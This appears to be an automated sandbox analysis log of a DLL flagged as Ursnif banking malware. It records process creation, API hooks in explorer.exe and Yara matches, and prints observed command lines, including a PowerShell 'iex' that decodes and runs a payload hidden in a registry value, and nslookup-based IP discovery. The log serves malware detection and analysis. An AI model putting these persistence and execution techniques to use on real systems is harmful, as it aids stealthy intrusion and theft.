                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1'
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1'
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hr4en22c.pth.ps1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD11B8 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle,0_2_00DD11B8
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
                      Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{023FD26A-79F2-8479-1356-BDF8F7EA41AC}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_01
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{5E9A7C9C-253E-40D9-9F72-297443C66DE8}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2812:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1568:120:WilError_01
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{BA7B1CC8-D157-FCAE-2B8E-95F08FA29924}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{72D23258-290F-740E-43C6-6DE8275AF19C}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:612:120:WilError_01
                      Source: C:\Windows\SysWOW64\cmd.exeMutant created: \Sessions\1\BaseNamedObjects\{82342662-F969-048B-93D6-3D78776AC12C}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{82DD54AC-F9FE-041C-93D6-3D78776AC12C}
                      Source: C:\Windows\System32\loaddll32.exeMutant created: \Sessions\1\BaseNamedObjects\{AEF8588D-35E8-10DC-2FC2-3944D3167DB8}
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: data.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: data.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: h.pdb> source: powershell.exe, 0000000F.00000003.961179690.0000029E611B1000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdbXP source: powershell.exe, 0000000F.00000002.1028629479.0000029E4CF68000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdbXP source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdbXP source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdbXP source: powershell.exe, 00000011.00000002.994879898.0000026445852000.00000004.00000001.sdmp
                      Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: loaddll32.exe, 00000000.00000002.1185778870.000000006E4FF000.00000002.00020000.sdmp, data.dll
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: data.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: data.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: data.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: data.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: data.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation:

Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4B2263 push ecx; ret 0_2_6E4B2273
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4B2210 push ecx; ret 0_2_6E4B2219
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00DD7AB0 push ecx; ret 0_2_00DD7AB9
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00DD7E1F push ecx; ret 0_2_00DD7E2F
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04584EE0 push ecx; ret 0_2_04584EE9
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_045679B6 push ss; ret 0_2_045679B7
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0458528F push ecx; ret 0_2_0458529F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BC4EE0 push ecx; ret 3_2_04BC4EE9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BA79B6 push ss; ret 3_2_04BA79B7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BC528F push ecx; ret 3_2_04BC529F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04A77AB0 push ecx; ret 5_2_04A77AB9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04A77E1F push ecx; ret 5_2_04A77E2F
Source: C:\Windows\System32\control.exe | Code function: 34_2_0093B1B5 push 3B000001h; retf 34_2_0093B1BA
Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67DB1B5 push 3B000001h; retf 45_2_000002D2D67DB1BA
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_009679B6 push ss; ret 49_2_009679B7
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_0098528F push ecx; ret 49_2_0098529F
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_00984EE0 push ecx; ret 49_2_00984EE9
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4B1552 LoadLibraryA,GetProcAddress, 0_2_6E4B1552
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
Source: aixojixg.dll.20.dr | Static PE information: real checksum: 0x0 should be: 0xee27
Source: keehvxm3.dll.24.dr | Static PE information: real checksum: 0x0 should be: 0xeb64
Source: data.dll | Static PE information: real checksum: 0x75958 should be: 0x7619a
Source: a52acufz.dll.19.dr | Static PE information: real checksum: 0x0 should be: 0x2fa8
Source: ddwuzigh.dll.23.dr | Static PE information: real checksum: 0x0 should be: 0x5f5e
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match - File source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
                      Source: Yara match - File source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
                      Source: Yara match - File source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
                      Source: Yara match - File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
                      Source: Yara match - File source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
                      Source: Yara match - File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
                      Source: Yara match - File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
                      Source: Yara match - File source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
                      Hooks registry keys query functions (used to hide registry keys)
                      Source: explorer.exe - IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                      Modifies the export address table of user mode modules (user mode EAT hooks)
                      Source: explorer.exe - IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
                      Modifies the prolog of user mode functions (user mode inline hooks)
                      Source: explorer.exe - User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                      Modifies the import address table of user mode modules (user mode IAT hooks)
                      Source: explorer.exe - EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
                      Source: C:\Windows\explorer.exe - Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550
                      Source: C:\Windows\System32\loaddll32.exe - Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe - Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exe - Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
